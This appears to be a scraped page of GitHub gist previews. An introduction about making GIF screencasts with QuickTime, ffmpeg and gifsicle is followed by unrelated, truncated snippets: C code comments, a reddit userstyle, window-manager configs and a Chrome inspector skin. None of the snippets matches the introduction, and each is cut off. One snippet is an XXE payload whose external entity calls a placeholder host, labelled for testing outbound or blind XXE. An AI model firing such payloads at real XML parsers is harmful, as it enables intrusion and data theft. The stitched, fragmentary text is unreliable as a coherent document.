This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.
To capture the video (filesize: 19MB), using the free "QuickTime Player" application:
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| /** | |
| * example C code using libcurl and json-c | |
| * to post and return a payload using | |
| * http://jsonplaceholder.typicode.com | |
| * | |
| * License: | |
| * | |
| * This code is licensed under MIT license | |
| * https://opensource.org/licenses/MIT | |
| * |
| /* | |
| //pix_ reddit | |
| //by twnsnd // natyusha | |
| */ | |
| @-moz-document domain('reddit.com') { | |
| /* gfycat/mediacrush fix*/ | |
| .gfyRVid.loaded, .video.loaded { | |
| position: relative !important; |
| ; bug.n - tiling window management | |
| ; @version 9.0.0 | |
| ;;Status bar | |
| Config_showBar=1 | |
| Config_horizontalBarPos=left | |
| Config_verticalBarPos=top | |
| Config_barWidth=100% | |
| Config_singleRowBar=1 | |
| Config_spaciousBar=0 |
| ff="/tmp/monsterwm.fifo" | |
| [[ -p $ff ]] || mkfifo -m 600 "$ff" | |
| # desktop names | |
| ds=("web" "dev" "foo" "null") | |
| # layout names | |
| ms=("T" "M" "B" "G" "F") | |
| while read -t 60 -r wmout || true; do |
| /**********************************************/ | |
| /* | |
| /* IR_Black Skin by Ben Truyman - 2011 | |
| /* | |
| /* Based on Todd Werth's IR_Black: | |
| /* http://blog.toddwerth.com/entries/2 | |
| /* | |
| /* Inspired by Darcy Clarke's blog post: | |
| /* http://darcyclarke.me/design/skin-your-chrome-inspector/ | |
| /* |